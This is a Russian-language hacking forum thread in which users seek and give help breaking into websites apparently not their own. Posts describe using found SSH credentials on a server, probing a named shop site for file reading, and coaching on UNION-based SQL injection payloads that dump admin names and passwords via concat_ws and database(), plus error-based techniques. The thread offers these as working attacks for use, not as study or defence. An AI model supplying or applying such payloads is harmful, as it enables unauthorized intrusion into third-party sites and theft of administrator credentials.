20.07.2014, 00:46
|
|
Участник форума
Регистрация: 05.03.2013
Сообщений: 194
С нами:
6941846
Репутация:
-7
|
|
Сообщение от UXOR
Один из вариантов:
Все получилось, спасибо вам за помощь.
|
|
|
20.07.2014, 18:28
|
|
Новичок
Регистрация: 28.05.2010
Сообщений: 0
С нами:
8397749
Репутация:
0
|
|
Каким-то непонятным образом нашёл файл text.py в котором были данные для входа для пользователя sara.
Доступ оказался доступом по SSH
Зашёл и обнаружил проблему -
Из под шелла (пользователь user1):
cd home
ls -la
5 папок с датой за июль
А из под SSH(пользователь sara):
cd home
ls -la
3 папки с датой за июнь
Пытался редактировать файл из под sara - всё редактируется, но при заходе из под шелла - никаких изменений не видно.
Теперь вопрос - почему так? Почему разные даты и разное количество папок?
Вывод id
user1:
uid=510(user1) gid=500(user) groups=500(user)
user:
uid=500(user) gid=500(user) groups=500(user)
sara:
uid=501(sara) gid=501(sara) groups=501(sara),4(adm),10(wheel),500(user)
|
|
|
|
20.07.2014, 19:21
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
кто подскажет, что за ошибка? sql inj или нет?
Код:
hxxp://www.allstarpl.com/shopping/preview_template.cfm?filepath=/webimages/entertainment/previews/ssz/ssz103540.jpg&negno='ssz103540&category=ENTTAIN&orient=H&purchase=yes&p_id=30661d02edffdde46661a-3692319B-E3DC-6A06-525DA1B3F55F24E5_213056427
|
|
|
|
21.07.2014, 00:28
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от vikler
кто подскажет, что за ошибка? sql inj или нет?
Код:
hxxp://www.allstarpl.com/shopping/preview_template.cfm?filepath=/webimages/entertainment/previews/ssz/ssz103540.jpg&negno='ssz103540&category=ENTTAIN&orient=H&purchase=yes&p_id=30661d02edffdde46661a-3692319B-E3DC-6A06-525DA1B3F55F24E5_213056427
Сообщение от None
The cause of this exception was: java.io.FileNotFoundException: \\Webserver1\inetpub\wwwroot\webimages\entertainme nt\PREVIEWS\ssz\P-ssz103540xx .jpg (The system cannot find the file specified).
Чтение файлов же.
Пилите аналоги нуллбайта в жаве.
|
|
|
|
21.07.2014, 03:06
|
|
Познающий
Регистрация: 16.08.2012
Сообщений: 92
С нами:
7231286
Репутация:
0
|
|
Сообщение от madhatter
Чтение файлов же.
Пилите аналоги нуллбайта в жаве.
ага, точно, спасибо!
|
|
|
|
21.07.2014, 15:37
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
С нами:
7680566
Репутация:
1
|
|
Парни, такая ситуация.
Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level.
Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20fro m%20admin%20limit%200,1--
Ответ - Table 'site.admin' doesn't exist
Подскажите, что за ситуация и как быть?
|
|
|
|
21.07.2014, 17:22
|
|
Познающий
Регистрация: 09.10.2009
Сообщений: 31
С нами:
8730571
Репутация:
19
|
|
Сообщение от billybonse
Парни, такая ситуация.
Нашел уязвимый сайт, через sql вытащил название таблицы - admin. Узнал названия колонок - admin_name, admin_email,admin_pass, admin_level.
Пишу - http://www.site.com/pages.php?id=-15%20union%20select%201,2,admin_name,4,5,6,7%20fro m%20admin%20limit%200,1--
Ответ - Table 'site.admin' doesn't exist
Подскажите, что за ситуация и как быть?
запрос должен быть таким примерно
http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admi n_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1--
[название бд сайта]- узнайте запросом
http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--
|
|
|
|
21.07.2014, 17:58
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
С нами:
7680566
Репутация:
1
|
|
Сообщение от Cybersteger
запрос должен быть таким примерно
http://www.site.com/pages.php?id=-15+union+select+1,2,concat_ws(0x3a,admin_name,admi n_pass),4,5,6,7+from+[название бд сайта].admin+limit+0,1--
[название бд сайта]- узнайте запросом
http://www.site.com/pages.php?id=-15+union+select+1,2,database(),4,5,6,7--
Название базы radiesse
Table 'radiesse.admin' doesn't exist
|
|
|
|
21.07.2014, 22:47
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
С нами:
7680566
Репутация:
1
|
|
Неужели никто не знает, что делать?
Еще пару вопросов, если позволите.
1. нашел уязвимый сайт, http://site.com/pages.php?id=-31%20union%20select%201,2,3,4,5--, выдает цифру 4
дальше пишу http://site.com/pages.php?id=-31%20union%20select%201,2,3,version(),5-- пишет 403 Forbidden
Почему?
2. Опять уязвимый сайт http://www.site.by/pages.php?id=7645
Перебираю колонки, сначала пишет he used SELECT statements have a different number of columns in query, дохожу до цифры 5, пишет Unknown column 'parent_id' in 'field list' in query. Если продолжаю перебирать колонки, опять выдает ошибку "неверное число колонок". Это иньекция или нет?
|
|
|
|
21.07.2014, 23:21
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от billybonse
Неужели никто не знает, что делать?
Еще пару вопросов, если позволите.
1. нашел уязвимый сайт, http://site.com/pages.php?id=-31%20union%20select%201,2,3,4,5--, выдает цифру 4
дальше пишу http://site.com/pages.php?id=-31%20union%20select%201,2,3,version(),5-- пишет 403 Forbidden
Почему?
2. Опять уязвимый сайт http://www.site.by/pages.php?id=7645
Перебираю колонки, сначала пишет he used SELECT statements have a different number of columns in query, дохожу до цифры 5, пишет Unknown column 'parent_id' in 'field list' in query. Если продолжаю перебирать колонки, опять выдает ошибку "неверное число колонок". Это иньекция или нет?
1. Сделай count(*) from BD.table
2. Error based
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
